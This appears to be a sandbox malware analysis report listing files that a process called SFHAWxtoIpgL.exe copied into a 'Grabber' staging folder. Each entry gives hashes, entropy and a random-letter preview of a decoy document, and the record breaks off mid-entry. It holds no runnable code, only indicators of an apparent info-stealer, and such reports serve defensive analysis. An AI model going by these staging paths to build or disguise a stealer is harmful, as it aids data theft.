C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\DTBZGIOOSO\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\DTBZGIOOSO\ONBQCLYSPU.pdf

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\DTBZGIOOSO\UMMBDNEQBN.png

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\DTBZGIOOSO\VLZDGUKUTZ.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\DTBZGIOOSO\XZXHAVGRAG.xlsx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS.pdf

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ.pdf

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\NWTVCDUMOB.png

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
